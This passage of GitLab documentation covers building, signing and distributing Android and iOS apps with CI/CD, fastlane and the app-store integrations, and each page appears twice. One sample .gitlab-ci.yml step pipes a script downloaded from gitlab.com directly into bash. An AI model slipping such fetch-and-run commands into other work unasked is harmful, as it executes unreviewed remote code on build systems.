`.gitignore` file so they aren't committed to version control. 1. Configure Gradle to use the newly created keystore. In the app's `build.gradle` file: 1. Immediately after the plugins section, add: ```gradle def keystoreProperties = new Properties() def keystorePropertiesFile = rootProject.file('.secure_files/release-keystore.properties') if (keystorePropertiesFile.exists()) { keystoreProperties.load(new FileInputStream(keystorePropertiesFile)) } ``` 1. Anywhere in the `android` block, add: ```gradle signingConfigs { release { keyAlias keystoreProperties['keyAlias'] keyPassword keystoreProperties['keyPassword'] storeFile keystoreProperties['storeFile'] ? file(keystoreProperties['storeFile']) : null storePassword keystoreProperties['storePassword'] } } ``` 1. Add the `signingConfig` to the release build type: ```gradle signingConfig signingConfigs.release ``` The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration: - `fastlane/Fastfile`: ```ruby default_platform(:android) platform :android do desc "Create and sign a new build" lane :build do gradle(tasks: ["clean", "assembleRelease", "bundleRelease"]) end end ``` - `.gitlab-ci.yml`: ```yaml build: image: fabernovel/android:api-33-v1.7.0 stage: build script: - apt update -y && apt install -y curl - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash - fastlane build ``` ## Set up Android apps distribution with Google Play integration and fastlane Signed builds can be uploaded to the Google Play Store by using the Mobile DevOps Distribution integrations. 1. [Create a Google service account](https://docs.fastlane.tools/actions/supply/#setup) in Google Cloud Platform and grant that account access to the project in Google Play. 1. Enable the Google Play integration: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > Integrations**. 1. Select **Google Play**. 1. Under **Enable integration**, select the **Active** checkbox. 1. In **Package name**, enter the package name of the app. For example, `com.gitlab.app_name`. 1. In **Service account key (.JSON)** drag or upload your key file. 1. Select **Save changes**. 1. Add the release step to your pipeline. The following is a sample `fastlane/Fastfile`: ```ruby default_platform(:android) platform :android do desc "Submit a new Beta build to the Google Play store" lane :beta do upload_to_play_store( track: 'internal', aab: 'app/build/outputs/bundle/release/app-release.aab', release_status: 'draft' ) end end ``` The following is a sample `.gitlab-ci.yml`: ```yaml beta: image: fabernovel/android:api-33-v1.7.0 stage: beta script: - fastlane beta ``` <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Google Play integration demo](https://youtu.be/Fxaj3hna4uk). Congratulations! Your app is now set up for automated building, signing, and distribution. Try creating a merge request to trigger your first pipeline. ## Related topics See the Mobile DevOps [Android Demo](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/android_demo) project for a complete build, sign, and release pipeline example for Android. For additional reference materials, see the [DevOps section](https://about.gitlab.com/blog/categories/devops/) of the GitLab blog.
https://docs.gitlab.com/ci/mobile_devops_tutorial_ios
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/mobile_devops_tutorial_ios.md
2025-08-13
doc/ci/mobile_devops
[ "doc", "ci", "mobile_devops" ]
mobile_devops_tutorial_ios.md
Verify
Mobile DevOps
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Build iOS apps with GitLab Mobile DevOps
null
In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your iOS mobile app, signs it with your credentials, and distributes it to app stores. To set up mobile DevOps: 1. [Set up your build environment](#set-up-your-build-environment) 1. [Configure code signing with fastlane](#configure-code-signing-with-fastlane) 1. [Set up app distribution with Apple Store integration and fastlane](#set-up-app-distribution-with-apple-store-integration-and-fastlane) ## Before you begin Before you start this tutorial, make sure you have: - A GitLab account with access to CI/CD pipelines - Your mobile app code in a GitLab repository - An Apple Developer account - [`fastlane`](https://fastlane.tools) installed locally ## Set up your build environment Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. 1. Create a `.gitlab-ci.yml` file in your repository root. 1. Add a [supported macOS images](../runners/hosted_runners/macos.md#supported-macos-images) to run a job on a [macOS GitLab hosted runners](../runners/hosted_runners/macos.md) (beta): ```yaml test: image: macos-14-xcode-15 stage: test script: - fastlane test tags: - saas-macos-medium-m1 ``` ## Configure code signing with fastlane To set up code signing for iOS, upload signed certificates to GitLab by using fastlane: 1. Initialize fastlane: ```shell fastlane init ``` 1. Generate a `Matchfile` with the configuration: ```shell fastlane match init ``` 1. Generate certificates and profiles in the Apple Developer portal and upload those files to GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match development ``` 1. Optional. If you have already created signing certificates and provisioning profiles for your project, use `fastlane match import` to load your existing files into GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match import ``` You are prompted to input the path to your files. After you provide those details, your files are uploaded and visible in your project's CI/CD settings. If prompted for the `git_url` during the import, it is safe to leave it blank and press <kbd>enter</kbd>. The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration: - `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for development" lane :build do setup_ci match(type: 'development', readonly: is_ci) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Debug", export_method: "development" ) end end ``` - `.gitlab-ci.yml`: ```yaml build_ios: image: macos-12-xcode-14 stage: build script: - fastlane build tags: - saas-macos-medium-m1 ``` ## Set up app distribution with Apple Store integration and fastlane Signed builds can be uploaded to the Apple App Store by using the Mobile DevOps Distribution integrations. Prerequisites: - You must have an Apple ID enrolled in the Apple Developer Program. - You must generate a new private key for your project in the Apple App Store Connect portal. To create an iOS distribution with the Apple Store integration and fastlane: 1. Generate an API Key for App Store Connect API. In the Apple App Store Connect portal, [generate a new private key for your project](https://developer.apple.com/documentation/appstoreconnectapi/creating_api_keys_for_app_store_connect_api). 1. Enable the Apple App Store Connect integration: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > Integrations**. 1. Select **Apple App Store Connect**. 1. Under **Enable integration**, select the **Active** checkbox. 1. Provide the Apple App Store Connect configuration information: - **Issuer ID**: The Apple App Store Connect issuer ID. - **Key ID**: The key ID of the generated private key. - **Private key**: The generated private key. You can download this key only once. - **Protected branches and tags only**: Enable to set variables on protected branches and tags only. 1. Select **Save changes**. 1. Add the release step to your pipeline and fastlane configuration. The following is a sample `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for distribution, upload to TestFlight" lane :beta do setup_ci match(type: 'appstore', readonly: is_ci) app_store_connect_api_key increment_build_number( build_number: latest_testflight_build_number(initial_build_number: 1) + 1, xcodeproj: "ios demo.xcodeproj" ) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Release", export_method: "app-store" ) upload_to_testflight end end ``` The following is a sample `.gitlab-ci.yml`: ```yaml beta_ios: image: macos-12-xcode-14 stage: beta script: - fastlane beta ``` Congratulations! Your app is now set up for automated building, signing, and distribution. Try creating a merge request to trigger your first pipeline. ## Sample projects Sample Mobile DevOps projects with pipelines configured to build, sign, and release mobile apps are available for: - Android - Flutter - iOS View all projects in the [Mobile DevOps Demo Projects](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/) group.
--- stage: Verify group: Mobile DevOps info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: 'Tutorial: Build iOS apps with GitLab Mobile DevOps' breadcrumbs: - doc - ci - mobile_devops --- In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your iOS mobile app, signs it with your credentials, and distributes it to app stores. To set up mobile DevOps: 1. [Set up your build environment](#set-up-your-build-environment) 1. [Configure code signing with fastlane](#configure-code-signing-with-fastlane) 1. [Set up app distribution with Apple Store integration and fastlane](#set-up-app-distribution-with-apple-store-integration-and-fastlane) ## Before you begin Before you start this tutorial, make sure you have: - A GitLab account with access to CI/CD pipelines - Your mobile app code in a GitLab repository - An Apple Developer account - [`fastlane`](https://fastlane.tools) installed locally ## Set up your build environment Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. 1. Create a `.gitlab-ci.yml` file in your repository root. 1. Add a [supported macOS images](../runners/hosted_runners/macos.md#supported-macos-images) to run a job on a [macOS GitLab hosted runners](../runners/hosted_runners/macos.md) (beta): ```yaml test: image: macos-14-xcode-15 stage: test script: - fastlane test tags: - saas-macos-medium-m1 ``` ## Configure code signing with fastlane To set up code signing for iOS, upload signed certificates to GitLab by using fastlane: 1. Initialize fastlane: ```shell fastlane init ``` 1. Generate a `Matchfile` with the configuration: ```shell fastlane match init ``` 1. Generate certificates and profiles in the Apple Developer portal and upload those files to GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match development ``` 1. Optional. If you have already created signing certificates and provisioning profiles for your project, use `fastlane match import` to load your existing files into GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match import ``` You are prompted to input the path to your files. After you provide those details, your files are uploaded and visible in your project's CI/CD settings. If prompted for the `git_url` during the import, it is safe to leave it blank and press <kbd>enter</kbd>. The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration: - `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for development" lane :build do setup_ci match(type: 'development', readonly: is_ci) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Debug", export_method: "development" ) end end ``` - `.gitlab-ci.yml`: ```yaml build_ios: image: macos-12-xcode-14 stage: build script: - fastlane build tags: - saas-macos-medium-m1 ``` ## Set up app distribution with Apple Store integration and fastlane Signed builds can be uploaded to the Apple App Store by using the Mobile DevOps Distribution integrations. Prerequisites: - You must have an Apple ID enrolled in the Apple Developer Program. - You must generate a new private key for your project in the Apple App Store Connect portal. To create an iOS distribution with the Apple Store integration and fastlane: 1. Generate an API Key for App Store Connect API. In the Apple App Store Connect portal, [generate a new private key for your project](https://developer.apple.com/documentation/appstoreconnectapi/creating_api_keys_for_app_store_connect_api). 1. Enable the Apple App Store Connect integration: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > Integrations**. 1. Select **Apple App Store Connect**. 1. Under **Enable integration**, select the **Active** checkbox. 1. Provide the Apple App Store Connect configuration information: - **Issuer ID**: The Apple App Store Connect issuer ID. - **Key ID**: The key ID of the generated private key. - **Private key**: The generated private key. You can download this key only once. - **Protected branches and tags only**: Enable to set variables on protected branches and tags only. 1. Select **Save changes**. 1. Add the release step to your pipeline and fastlane configuration. The following is a sample `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for distribution, upload to TestFlight" lane :beta do setup_ci match(type: 'appstore', readonly: is_ci) app_store_connect_api_key increment_build_number( build_number: latest_testflight_build_number(initial_build_number: 1) + 1, xcodeproj: "ios demo.xcodeproj" ) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Release", export_method: "app-store" ) upload_to_testflight end end ``` The following is a sample `.gitlab-ci.yml`: ```yaml beta_ios: image: macos-12-xcode-14 stage: beta script: - fastlane beta ``` Congratulations! Your app is now set up for automated building, signing, and distribution. Try creating a merge request to trigger your first pipeline. ## Sample projects Sample Mobile DevOps projects with pipelines configured to build, sign, and release mobile apps are available for: - Android - Flutter - iOS View all projects in the [Mobile DevOps Demo Projects](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/) group.
https://docs.gitlab.com/ci/mobile_devops
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/mobile_devops
[ "doc", "ci", "mobile_devops" ]
_index.md
Verify
Mobile DevOps
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Mobile DevOps
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Build, sign, and release native and cross-platform mobile apps for Android and iOS by using GitLab CI/CD. GitLab Mobile DevOps provides tools and best practices to automate your mobile app development workflow. GitLab Mobile DevOps integrates key mobile development capabilities into the GitLab DevSecOps platform: - Build environments for iOS and Android development - Secure code signing and certificate management - App store distribution for Google Play and Apple App Store ## Build environments For complete control over the build environment, you can use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners). ## Code signing All Android and iOS apps must be securely signed before being distributed through the various app stores. Signing ensures that applications haven't been tampered with before reaching a user's device. With [project-level secure files](../secure_files/_index.md), you can store the following in GitLab, so that they can be used to securely sign apps in CI/CD builds: - Keystores - Provision profiles - Signing certificates <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Project-level secure files demo](https://youtu.be/O7FbJu3H2YM). ## Distribution Signed builds can be uploaded to the Google Play Store or Apple App Store by using the Mobile DevOps Distribution integrations. ## Related topics For step-by-step guidance on implementing Mobile DevOps, see: - [Tutorial: Build Android apps with GitLab Mobile DevOps](mobile_devops_tutorial_android.md) - [Tutorial: Build iOS apps with GitLab Mobile DevOps](mobile_devops_tutorial_ios.md)
--- stage: Verify group: Mobile DevOps info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Mobile DevOps breadcrumbs: - doc - ci - mobile_devops --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Build, sign, and release native and cross-platform mobile apps for Android and iOS by using GitLab CI/CD. GitLab Mobile DevOps provides tools and best practices to automate your mobile app development workflow. GitLab Mobile DevOps integrates key mobile development capabilities into the GitLab DevSecOps platform: - Build environments for iOS and Android development - Secure code signing and certificate management - App store distribution for Google Play and Apple App Store ## Build environments For complete control over the build environment, you can use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners). ## Code signing All Android and iOS apps must be securely signed before being distributed through the various app stores. Signing ensures that applications haven't been tampered with before reaching a user's device. With [project-level secure files](../secure_files/_index.md), you can store the following in GitLab, so that they can be used to securely sign apps in CI/CD builds: - Keystores - Provision profiles - Signing certificates <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Project-level secure files demo](https://youtu.be/O7FbJu3H2YM). ## Distribution Signed builds can be uploaded to the Google Play Store or Apple App Store by using the Mobile DevOps Distribution integrations. ## Related topics For step-by-step guidance on implementing Mobile DevOps, see: - [Tutorial: Build Android apps with GitLab Mobile DevOps](mobile_devops_tutorial_android.md) - [Tutorial: Build iOS apps with GitLab Mobile DevOps](mobile_devops_tutorial_ios.md)